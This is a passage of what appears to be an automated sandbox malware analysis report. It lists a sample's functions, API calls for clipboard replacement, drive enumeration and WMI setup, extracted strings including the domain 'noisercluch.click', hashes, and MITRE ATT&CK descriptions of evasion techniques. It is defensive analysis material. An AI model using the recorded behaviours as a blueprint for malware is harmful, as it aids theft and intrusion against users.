SysFreeString.OLEAUT32(00000000), ref: 00437399
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004373D5

Strings

\, xrefs: 00436DCB

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: String$Free$Alloc$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: \
API String ID: 3857627774-2967466578
Opcode ID: 75a42a090690cbf01e55e82e48ecf76e61ca4ec783f0b790b218db4d75954228
Instruction ID: 8756ce95e963843fa03f31509ff188bcb667b0217098414990354d88698b1c24
Opcode Fuzzy Hash: 75a42a090690cbf01e55e82e48ecf76e61ca4ec783f0b790b218db4d75954228
Instruction Fuzzy Hash: 9132F1B1A483408FD724CF28C88076BBBE1EF99314F18892EE9D59B391D7789805CB56

Function 05701000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 05701032
OpenClipboard.USER32(00000000), ref: 0570103C
GetClipboardData.USER32(0000000D), ref: 0570104C
GlobalLock.KERNEL32(00000000), ref: 0570105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05701090
GlobalLock.KERNEL32 ref: 057010A0
GlobalUnlock.KERNEL32 ref: 057010C1
EmptyClipboard.USER32 ref: 057010CB
SetClipboardData.USER32(0000000D), ref: 057010D6
GlobalFree.KERNEL32 ref: 057010E3
GlobalUnlock.KERNEL32(?), ref: 057010ED
CloseClipboard.USER32 ref: 057010F3
GetClipboardSequenceNumber.USER32 ref: 057010F9

Memory Dump Source

Source File: 00000009.00000002.2889501146.0000000005701000.00000020.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: true

Associated: 00000009.00000002.2889460302.0000000005700000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2889535161.0000000005702000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5700000_powershell.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: a581dba247bc2afce8732b62e07173520253e57e1d59a41f063f52d8a493d019
Instruction ID: 663f53289ce68b1a188bdf15eff9c3c35a63ec0ae9022c2188cede4a6f5d467d
Opcode Fuzzy Hash: a581dba247bc2afce8732b62e07173520253e57e1d59a41f063f52d8a493d019
Instruction Fuzzy Hash: 5F21C836618250DBD7242B71EC0EB6BBFE8FF04745F44A028F985D6192EF619800F7A1

Function 00415640 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 943
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JHN], xrefs: 00415D66
Fi, xrefs: 00415D71
UR, xrefs: 00415AE3
s|}, xrefs: 0041606E
>j%h, xrefs: 00415976
wq, xrefs: 00416063
YU]&, xrefs: 00416170

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 744f5921334badd97250c1c299283197a61e04fc11c6ff6aa40322fb847e4306
Instruction ID: 6413b6cc339066a55532578e80e6a8cd990dac4ee94ef104ad543d9b904f88e5
Opcode Fuzzy Hash: 744f5921334badd97250c1c299283197a61e04fc11c6ff6aa40322fb847e4306
Instruction Fuzzy Hash: 2E5224B5908740CBD7249F29D8527EFB7E1EFD5314F188A2EE48987391EB389841CB46

Function 00408720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408744
GetCurrentThreadId.KERNEL32 ref: 0040874E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408808
GetForegroundWindow.USER32 ref: 004089A1
ExitProcess.KERNEL32 ref: 00408A17

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 18fe486032edb0969c4fe46b9c72ea22f78cc782d11755b5447650c5aff50698
Instruction ID: 59a09f4aa6f0f146742c4b312151e509a05fd4ea0b744ce26f1448cff0f88d73
Opcode Fuzzy Hash: 18fe486032edb0969c4fe46b9c72ea22f78cc782d11755b5447650c5aff50698
Instruction Fuzzy Hash: E57168B3E043144BC318EF69DC4135AB6C79BC0714F1F813EA984EB3A5DE799C02869A

Function 0042BF45 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C34C

Strings

@a, xrefs: 0042C2AF
u, xrefs: 0042C364
L,2H, xrefs: 0042BF4D

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: @a$L,2H$u
API String ID: 3960555810-2528062038
Opcode ID: 19d08f9f7d7bed7b51ea453a9ddedc70aa30b931c2df07c4920a08e0e96f246b
Instruction ID: 260f7405a81d4791661634af8caf9a7863cff9be19d6ba05b95630b53f05b8d3
Opcode Fuzzy Hash: 19d08f9f7d7bed7b51ea453a9ddedc70aa30b931c2df07c4920a08e0e96f246b
Instruction Fuzzy Hash: 5B91D37050C3D08FD729CF3994A07ABBBD1AFA7308F58499ED4C997282D7398506CB5A

Function 0040D35C Relevance: 6.6, APIs: 2, Strings: 2, Instructions: 625
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040D368
CoUninitialize.COMBASE ref: 0040D7A4

Strings

(P, xrefs: 0040D7B2
noisercluch.click, xrefs: 0040D78B, 0040DBDE

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: Uninitialize
String ID: (P$noisercluch.click
API String ID: 3861434553-1665479885
Opcode ID: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
Instruction ID: 25c0ec8a4ed120f5396a3a8eb6bdccd7f9d1ac3417b5368b8856c91530714b40
Opcode Fuzzy Hash: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
Instruction Fuzzy Hash: 9522F37194D3C18AD335CF39D49079BBFE0AF96304F188AADC4D96B282D739450ACB96

Function 0042C289 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C34C

Strings

@a, xrefs: 0042C2AF
u, xrefs: 0042C364

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: @a$u
API String ID: 3960555810-583156259
Opcode ID: d3dcd12708497a123305e223026c5427f1c8ff29cf19f116bf7101b30c51974c
Instruction ID: fbcac5f05e551be09428fe54d577bd2475c49f62c0f93ee7e958261cddcd3d67
Opcode Fuzzy Hash: d3dcd12708497a123305e223026c5427f1c8ff29cf19f116bf7101b30c51974c
Instruction Fuzzy Hash: 4E81147050C3D08BD329CF3994A07ABBBD1AF97304F5849AED4C997382DB798506CB5A

Function 0043BAD0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043EA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043BAFE

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0042F37A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0042F42A

Strings

0, xrefs: 0042F6C0

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 8da7bf490a034171e3dce45de74038d4641a0d6d0dca22c35aceb32db23d8fd3
Instruction ID: a1bca001c7a4cafc18474ec3c09c662e33e11ff26cf3423f3d2483c3ce0ae8c6
Opcode Fuzzy Hash: 8da7bf490a034171e3dce45de74038d4641a0d6d0dca22c35aceb32db23d8fd3
Instruction Fuzzy Hash: F1A1AE70108FC28AD332C63C88587D7BFD15BA7324F484BADD0FA4A3E6D6A52146C766

Function 0043165C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 004316F5

Strings

0, xrefs: 00431870

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 25ab0af81ca39a2f35250ae81ccfa8cb2cc541f9024661974fe6062f9beea9ae
Instruction ID: 0bc001b784ff9219c14a20724f0671f28d23ae2ac33e4cc183003bbe73fc1bcb
Opcode Fuzzy Hash: 25ab0af81ca39a2f35250ae81ccfa8cb2cc541f9024661974fe6062f9beea9ae
Instruction Fuzzy Hash: 38812460108BC1CED366CB3C8888A067F922B6B224F1E87D9D1E94F7F3C665D506C766

Function 0042F787 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 0042F793

Strings

0, xrefs: 0042F924

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: FreeString
String ID: 0
API String ID: 3341692771-4108050209
Opcode ID: 380e84ca371044cea28e8452650673017fa369a6050c559cfbf2dc47d4d33812
Instruction ID: bde3fda008fae2ddbf337259ae56ab0a534ac6309ad685f2f7a7d6aa015b5799
Opcode Fuzzy Hash: 380e84ca371044cea28e8452650673017fa369a6050c559cfbf2dc47d4d33812
Instruction Fuzzy Hash: B1718850108FC1C9D372CB3C8548607BFE16B67224F484B9DD1E64BBE6D3AAB509C76A

Function 00435BDB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00435C00

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 1f3a4874fe6a934c83db0129cb2c4f35d243ae89896cc335940cfab8c0206f25
Instruction ID: d529aa2c6436962cd02f9ff259ed32c9c8aa20a75f7e6bd79d554a5377992a07
Opcode Fuzzy Hash: 1f3a4874fe6a934c83db0129cb2c4f35d243ae89896cc335940cfab8c0206f25
Instruction Fuzzy Hash: 4801D2358043A58FCF118F7898442EE7FA16F1A314F18469DC8D567396D739AA01CB96

Function 0043BA70 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,004377BF,00000000,00004000,00000000,004377BF,00000000,00004000), ref: 0043BAA2

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f12a0d30cc2367c78ba08f1fd21fcf34805736e507490131006d9ced82152e8a
Instruction ID: be575660327ce48efbff70f1a81ba6d67653373a4ecd42db05ccb867a55137c7
Opcode Fuzzy Hash: f12a0d30cc2367c78ba08f1fd21fcf34805736e507490131006d9ced82152e8a
Instruction Fuzzy Hash: CBE02B36418311BBC2152F347D05B173A78DFCA734F050836F40192111DB38E81281EF

Function 0042FB06 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042FB4C

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 0f3a594d24f492ad421ea8460d4e17b4e5aba94734245f3cc342df4c7054f90f
Instruction ID: 4e2864844023ea26aa9e2ee02480731ef327d8f3645c39fc8e2c289bfba3a2ea
Opcode Fuzzy Hash: 0f3a594d24f492ad421ea8460d4e17b4e5aba94734245f3cc342df4c7054f90f
Instruction Fuzzy Hash: CCF070B4509701CFE314DF28D5A8B1ABBF0FB89304F11891CE4958B3A1CB75A549CF82

Function 00430779 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004307C3

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: d0d004b74e83634fe9f7cd80248a028dc92d7887ef778d010a08205c6b6403e5
Instruction ID: f402ad757b55e4d436691d2150176b8ee0a7d87fd75628386497c25852c9749b
Opcode Fuzzy Hash: d0d004b74e83634fe9f7cd80248a028dc92d7887ef778d010a08205c6b6403e5
Instruction Fuzzy Hash: 69F017B55483028FE301CF24C55835BBBE1BBC5308F15892CE0A44B354C7B5A5498FC2

Function 0043BC91 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043BCA2

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: de7ba2978205d3e5dac454b169e1469a028ee3eec04f5a814a46a1d3adc94483
Instruction ID: 34fc1b220f50a438f75fecb060dcf8b9689bf8e5ef46e1e0de830b6ef63ced86
Opcode Fuzzy Hash: de7ba2978205d3e5dac454b169e1469a028ee3eec04f5a814a46a1d3adc94483
Instruction Fuzzy Hash: DBE04FB9E019459FCB48CF29FC504B977A2E759314704547DE503C7761DB389906CB08

Function 0040C900 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 848936b2f6a1009ae71585b31087a1977fcf0e71369a6819067518d21a73774f
Instruction ID: 600c1c55f4c47978a808d38d6d603c7baf665e00bbb4b934b296b6fd480c4591
Opcode Fuzzy Hash: 848936b2f6a1009ae71585b31087a1977fcf0e71369a6819067518d21a73774f
Instruction Fuzzy Hash: D5D02E21A140842BC608AB2CDC06F2736A8C703B92F000238A293C62D2E8007A00C169

Function 0040C935 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C947

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 921506b26635a132b4df4f2ddd7b465313c55da5b78467d40561622a9134298f
Instruction ID: fd192ded0c0cb464a206ce1d3467658bba8c5c20ae5ff3727e68ffbe475560a4
Opcode Fuzzy Hash: 921506b26635a132b4df4f2ddd7b465313c55da5b78467d40561622a9134298f
Instruction Fuzzy Hash: 8AD0C9787D83807AF1648B18EC17F203210AB02F66F340228B363FE2E2CAD07201860C

Function 0043A0A0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00413147), ref: 0043A0C0

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7e4a886f44f579dff80980d892cb73d2b56cb90909c1320e76daed750195b038
Instruction ID: 91785600a9bb6ba1e718d507953919cb8ba152ebb43f2213e550c9c7e00cfb49
Opcode Fuzzy Hash: 7e4a886f44f579dff80980d892cb73d2b56cb90909c1320e76daed750195b038
Instruction Fuzzy Hash: E6D0C931459222EBC6642F28BC05BCB3A68DF49721F0748A1B8046A075CB25DC92DAD8

Non-executed Functions

Function 00431D10 Relevance: 40.4, APIs: 2, Strings: 21, Instructions: 163COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431D59
GetSystemMetrics.USER32 ref: 00431D69

Strings

O$C, xrefs: 00431F35
O$C, xrefs: 00431F09
O$C, xrefs: 00431F14
_(C, xrefs: 00431FC4
O$C, xrefs: 00431FDA
O$C, xrefs: 00431FAE
O$C, xrefs: 00431EF3
O$C, xrefs: 00431F61
, xrefs: 00431E56
O$C, xrefs: 00431F56
O$C, xrefs: 00431EE8
O$C, xrefs: 00431F40
O$C, xrefs: 00431F8D
i*C, xrefs: 00431F77
O$C, xrefs: 00431F98
O$C, xrefs: 00431FB9
($C, xrefs: 00431EC7
O$C, xrefs: 00431FE5
5"C, xrefs: 00431FCF
O$C, xrefs: 00431FFB
O$C, xrefs: 00432006

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: MetricsSystem
String ID: $($C$5"C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$_(C$i*C
API String ID: 4116985748-3372999186
Opcode ID: 8e9cdeb4bfab84274a9669cd475aa5743967b19e075009f034f97172db1c8e9c
Instruction ID: 8d029f29b9a4e16f053ed14b1b3047fa4adeb45d898568eba0a28193ac899bff
Opcode Fuzzy Hash: 8e9cdeb4bfab84274a9669cd475aa5743967b19e075009f034f97172db1c8e9c
Instruction Fuzzy Hash: EEA16BB041C7818BE770DF18C448B9BBBE0BBC6308F51892ED5989B651C7B99848CF87

Function 00431B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431B24
GetClipboardData.USER32 ref: 00431B3F
GlobalLock.KERNEL32 ref: 00431B58
GetWindowLongW.USER32 ref: 00431BC7
GlobalUnlock.KERNEL32 ref: 00431CE7
CloseClipboard.USER32 ref: 00431CF4

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 5502842d010c68d0be0a87ba9bd2940b424877ada9b18a2ce83abf0bf6e0d2fd
Instruction ID: 456b1e1cfcf1951664547b6acc2f3bc49ddc4e535775eb3306363a95376e0e20
Opcode Fuzzy Hash: 5502842d010c68d0be0a87ba9bd2940b424877ada9b18a2ce83abf0bf6e0d2fd
Instruction Fuzzy Hash: E151E5B264C7818FC3009FBC888525EBAD1ABC9324F185B3EE5E5873E1D6788545C35B

Function 004234B7 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00423606

Strings

H:B, xrefs: 0042349C, 004234B1
uw, xrefs: 00423503
pz, xrefs: 004236BA
pz, xrefs: 0042376E, 004234A8
xs, xrefs: 004234FC

Memory Dump Source

Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_powershell.jbxd

Similarity

API ID: DrivesLogical
String ID: H:B$pz$pz$uw$xs
API String ID: 999431828-1762182995
Opcode ID: ffd0a98ec40f3e7c8e4b77ea1664b5a147b98ae172b7dd95e73b24025a02c0b6
Instruction ID: a8d23ff692b1174eb06db715e9a28044fd6105134fdaffa46370887a1062778d
Opcode Fuzzy Hash: ffd0a98ec40f3e7c8e4b77ea1664b5a147b98ae172b7dd95e73b24025a02c0b6
Instruction Fuzzy Hash: 718104B9E01216CFDB14CF64E8916AABB70FF1A304B4991A8D445AF322D738D981CFC5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
